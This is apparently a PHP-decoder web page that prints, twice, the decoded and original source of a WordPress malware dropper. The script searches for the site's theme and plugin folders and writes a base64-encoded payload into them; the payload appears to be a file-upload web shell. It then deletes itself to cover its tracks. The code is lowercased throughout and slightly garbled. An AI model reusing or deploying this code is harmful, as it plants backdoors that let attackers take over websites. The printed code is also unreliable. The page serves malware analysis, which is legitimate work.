Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function myfilename() { $str = <<<eod script_filename eod; return $_server[$str]; } ..

Decoded Output download

<?php function myfilename() { $str = <<<eod script_filename eod; return $_server[$str]; } function killme() { unlink(myfilename()); } function ei7pglce0() { $s = myfilename(); $p = strrpos($s, chr(0x2f) ); return $p ? substr($s, 0, $p) . chr(0x2f) : trim(chr(0x20)); } function makemsg($pcode, $pmsg) { $str_dtilde = chr(0x7e) . chr(0x7e); $r = trim( chr(0x20) ); $r .= $str_dtilde; $r .= chr(0x38) . chr(0x39) . chr(0x38); $r .= $str_dtilde; $r .= $pcode; $r .= $str_dtilde; $r .= $pmsg; $r .= $str_dtilde; $r .= chr(0x31) . chr(0x31) . chr(0x39); $r .= $str_dtilde; return $r; } function zfde4jq($pmsg) { killme(); echo makemsg(chr(0x30), $pmsg); die(); } function dxfos4ub9hxsitz_wp($ppath) { killme(); echo makemsg(chr(0x31), $ppath); die(); } function dxfos4ub9hxsitz_near($ppath) { killme(); echo makemsg(chr(0x32), $ppath); die(); } function xitu7zyg7jq3r9($pdir) { $p = strrpos($pdir, chr(0x2f), -2); return $p ? substr($pdir, 0, $p) . chr(0x2f) 
: trim(chr(0x20)); } function p47tbkpkww($pdir) { if (!@is_dir($pdir)) return 0; $h = @opendir( $pdir ); if ($h === false) return 0; $sd = @readdir($h); closedir($h); return $sd !== false; } function azj9tg($pdir) { $tmp_str_wp_content = <<<eod wp-content eod; $d = 0; $cur = $pdir; while($d < 30) { if (@is_dir($cur . $tmp_str_wp_content)) return $cur; $try = xitu7zyg7jq3r9($cur); if ($try == trim(chr(0x20)) || !p47tbkpkww($try)) break; $d ++; $cur = $try; } return null; } 
function tltjoj($pabsfn, $pdata) { $tmp_str_wb = <<<eod wp-content eod; $f = @fopen($pabsfn, $tmp_str_wb); if (!$f) return 0; $r = fwrite($f, $pdata); fclose($f); return $r !== false; } function kzoizxdiy($pbasepath, &$parret) { $h = @opendir( $pbasepath ); if (!$h) return; $str_double_dot = chr(0x2e) . chr(0x2e); while( true == ($sd = @readdir($h)) ) { if ($sd == chr(0x2e) || $sd == $str_double_dot ) continue; $f = $pbasepath . $sd; if (@is_link($f) || !@is_dir($f)) continue; $f .= chr(0x2f); $parret[] = $f; } @closedir($h); } function fkhzz8jownr(&$pdirs) { $ignoreshit = <<<eod akismet eod; for ($x = 0; $x < 20; $x ++ ) { $ind = rand() % count($pdirs); if ( strpos($pdirs[$ind], $ignoreshit) !== false) continue; if ( file_exists( $pdirs[$ind] ) ) return $ind; } return -1; } $gjuice = <<<eod pgh0bww+cjxozwfkpgo8bwv0ysbodhrwlwvxdwl2psjdb250zw50lvr5cguiignvbnrlbnq9inrlehqvahrtbdsgy2hhcnnldd13aw5kb3dzlxv0zi04ij4kphrpdgxlpmlunksxcnvsujwvdgl0bgu+cjwvagvhzd4gcjxib2r5pgo8p3bocapwcmludcanpggxpinwqcrjqcm8l2gxpic7cmvjag8gillvdxigsva6ici7icakzwnobyakx1nfulzfulsnukvnt1rfx0ferfinxtskzwnobyaipgzvcm0gbwv0ag9kpvwicg9zdfwiigvuy3r5cgu9xcjtdwx0axbhcnqvzm9ybs1kyxrhxci+xg4iowply2hvici8aw5wdxqgdhlwzt1cimzpbgvciibuyw1lpvwizmlszw5hbwvcij48yni+ifxuijskzwnobyaipgluchv0ihr5cgu9xcjzdwjtaxrciib2ywx1zt1cikxpqurcij48yni+xg4iowply2hvici8l2zvcm0+xg4ioyagcgppziaoqglzx3vwbg9hzgvkx2zpbguoicrfrklmrvnbimzpbgvuyw1lil1binrtcf9uyw1lil0gkskkewojicakcw1vdmvfdxbsb2fkzwrfzmlszsgkx0zjtevtwyjmawxlbmftzsjdwyj0bxbfbmftzsjdlcavkl8qlyagjf9gsuxfu1sizmlszw5hbwuixvsibmftzsjdktskcs8qxyovcgkkzmlszsa9icrfrklmrvnbimzpbgvuyw1lil1bim5hbwuixtsgiaojzwnobyaipgegahjlzj1ciirmawxlxci+jgzpbgu8l2e+ijskcs8qxyovcn0kzwxzzqp7cgkgcglly2hvkcjlbxb0esipowojlypfki8kfqogiaokdmfymsa9icrfu0vsvkvswydtq1jjufrfrklmru5btuunxtskicakdg91y2goicr2yxixick7cj8+cjwvym9ket4kpc9odg1spiak eod; $gjuice = base64_decode($gjuice); $gname = <<<eod bgljzw5zzs5waha= eod; $gname = base64_decode($gname); $gstrdirthemes = <<<eod wp-content/themes/ eod; $gstrdirplugins = <<<eod wp-content/plugins/ eod; $fff = trim(chr(0x20)); $wp_root = azj9tg( ei7pglce0() ); $is_failed_in_wp = 0; if ($wp_root) { $dir_themes = $wp_root . $gstrdirthemes; $dir_plugs = $wp_root . $gstrdirplugins; $dirs = array(); kzoizxdiy($dir_plugs, $dirs); kzoizxdiy($dir_themes, $dirs); while ( 1) { $num_dirs = count($dirs); if ($num_dirs < 1) break; $ii = fkhzz8jownr($dirs); if 
($ii == -1) break; $fff = $dirs[$ii] . $gname; if ( tltjoj($fff, $gjuice) ) { dxfos4ub9hxsitz_wp($fff); } $is_failed_in_wp = 1; array_splice($dirs, $ii, 1); } 
} $gstrfailsave1 = <<<eod failed to save wp & near eod; $gstrfailsave2 = <<<eod failed to save near eod; $fff = ei7pglce0() . $gname; if ( tltjoj($fff, $gjuice) ) dxfos4ub9hxsitz_near($fff); if ($is_failed_in_wp) zfde4jq($gstrfailsave1); zfde4jq($gstrfailsave1) ?>

Did this file decode correctly?

Original Code

<?php function myfilename() { $str = <<<eod script_filename eod; return $_server[$str]; } function killme() { unlink(myfilename()); } function ei7pglce0() { $s = myfilename(); $p = strrpos($s, chr(0x2f) ); return $p ? substr($s, 0, $p) . chr(0x2f) : trim(chr(0x20)); } function makemsg($pcode, $pmsg) { $str_dtilde = chr(0x7e) . chr(0x7e); $r = trim( chr(0x20) ); $r .= $str_dtilde; $r .= chr(0x38) . chr(0x39) . chr(0x38); $r .= $str_dtilde; $r .= $pcode; $r .= $str_dtilde; $r .= $pmsg; $r .= $str_dtilde; $r .= chr(0x31) . chr(0x31) . chr(0x39); $r .= $str_dtilde; return $r; } function zfde4jq($pmsg) { killme(); echo makemsg(chr(0x30), $pmsg); die(); } function dxfos4ub9hxsitz_wp($ppath) { killme(); echo makemsg(chr(0x31), $ppath); die(); } function dxfos4ub9hxsitz_near($ppath) { killme(); echo makemsg(chr(0x32), $ppath); die(); } function xitu7zyg7jq3r9($pdir) { $p = strrpos($pdir, chr(0x2f), -2); return $p ? substr($pdir, 0, $p) . chr(0x2f)
: trim(chr(0x20)); } function p47tbkpkww($pdir) { if (!@is_dir($pdir)) return 0; $h = @opendir( $pdir ); if ($h === false) return 0; $sd = @readdir($h); closedir($h); return $sd !== false; } function azj9tg($pdir) { $tmp_str_wp_content = <<<eod wp-content eod; $d = 0; $cur = $pdir; while($d < 30) { if (@is_dir($cur . $tmp_str_wp_content)) return $cur; $try = xitu7zyg7jq3r9($cur); if ($try == trim(chr(0x20)) || !p47tbkpkww($try)) break; $d ++; $cur = $try; } return null; }
function tltjoj($pabsfn, $pdata) { $tmp_str_wb = <<<eod wp-content eod; $f = @fopen($pabsfn, $tmp_str_wb); if (!$f) return 0; $r = fwrite($f, $pdata); fclose($f); return $r !== false; } function kzoizxdiy($pbasepath, &$parret) { $h = @opendir( $pbasepath ); if (!$h) return; $str_double_dot = chr(0x2e) . chr(0x2e); while( true == ($sd = @readdir($h)) ) { if ($sd == chr(0x2e) || $sd == $str_double_dot ) continue; $f = $pbasepath . $sd; if (@is_link($f) || !@is_dir($f)) continue; $f .= chr(0x2f); $parret[] = $f; } @closedir($h); } function fkhzz8jownr(&$pdirs) { $ignoreshit = <<<eod akismet eod; for ($x = 0; $x < 20; $x ++ ) { $ind = rand() % count($pdirs); if ( strpos($pdirs[$ind], $ignoreshit) !== false) continue; if ( file_exists( $pdirs[$ind] ) ) return $ind; } return -1; } $gjuice = <<<eod pgh0bww+cjxozwfkpgo8bwv0ysbodhrwlwvxdwl2psjdb250zw50lvr5cguiignvbnrlbnq9inrlehqvahrtbdsgy2hhcnnldd13aw5kb3dzlxv0zi04ij4kphrpdgxlpmlunksxcnvsujwvdgl0bgu+cjwvagvhzd4gcjxib2r5pgo8p3bocapwcmludcanpggxpinwqcrjqcm8l2gxpic7cmvjag8gillvdxigsva6ici7icakzwnobyakx1nfulzfulsnukvnt1rfx0ferfinxtskzwnobyaipgzvcm0gbwv0ag9kpvwicg9zdfwiigvuy3r5cgu9xcjtdwx0axbhcnqvzm9ybs1kyxrhxci+xg4iowply2hvici8aw5wdxqgdhlwzt1cimzpbgvciibuyw1lpvwizmlszw5hbwvcij48yni+ifxuijskzwnobyaipgluchv0ihr5cgu9xcjzdwjtaxrciib2ywx1zt1cikxpqurcij48yni+xg4iowply2hvici8l2zvcm0+xg4ioyagcgppziaoqglzx3vwbg9hzgvkx2zpbguoicrfrklmrvnbimzpbgvuyw1lil1binrtcf9uyw1lil0gkskkewojicakcw1vdmvfdxbsb2fkzwrfzmlszsgkx0zjtevtwyjmawxlbmftzsjdwyj0bxbfbmftzsjdlcavkl8qlyagjf9gsuxfu1sizmlszw5hbwuixvsibmftzsjdktskcs8qxyovcgkkzmlszsa9icrfrklmrvnbimzpbgvuyw1lil1bim5hbwuixtsgiaojzwnobyaipgegahjlzj1ciirmawxlxci+jgzpbgu8l2e+ijskcs8qxyovcn0kzwxzzqp7cgkgcglly2hvkcjlbxb0esipowojlypfki8kfqogiaokdmfymsa9icrfu0vsvkvswydtq1jjufrfrklmru5btuunxtskicakdg91y2goicr2yxixick7cj8+cjwvym9ket4kpc9odg1spiak eod; $gjuice = base64_decode($gjuice); $gname = <<<eod bgljzw5zzs5waha= eod; $gname = base64_decode($gname); $gstrdirthemes = <<<eod wp-content/themes/ eod; $gstrdirplugins = <<<eod wp-content/plugins/ eod; $fff = trim(chr(0x20)); $wp_root = azj9tg( ei7pglce0() ); $is_failed_in_wp = 0; if ($wp_root) { $dir_themes = $wp_root . $gstrdirthemes; $dir_plugs = $wp_root . $gstrdirplugins; $dirs = array(); kzoizxdiy($dir_plugs, $dirs); kzoizxdiy($dir_themes, $dirs); while ( 1) { $num_dirs = count($dirs); if ($num_dirs < 1) break; $ii = fkhzz8jownr($dirs); if
($ii == -1) break; $fff = $dirs[$ii] . $gname; if ( tltjoj($fff, $gjuice) ) { dxfos4ub9hxsitz_wp($fff); } $is_failed_in_wp = 1; array_splice($dirs, $ii, 1); }
} $gstrfailsave1 = <<<eod failed to save wp & near eod; $gstrfailsave2 = <<<eod failed to save near eod; $fff = ei7pglce0() . $gname; if ( tltjoj($fff, $gjuice) ) dxfos4ub9hxsitz_near($fff); if ($is_failed_in_wp) zfde4jq($gstrfailsave1); zfde4jq($gstrfailsave1) ?>

Function Calls

None

Variables

None

Stats

MD5 2cd4201485de3ff13e8baf302cac4746
Eval Count 0
Decode Time 91 ms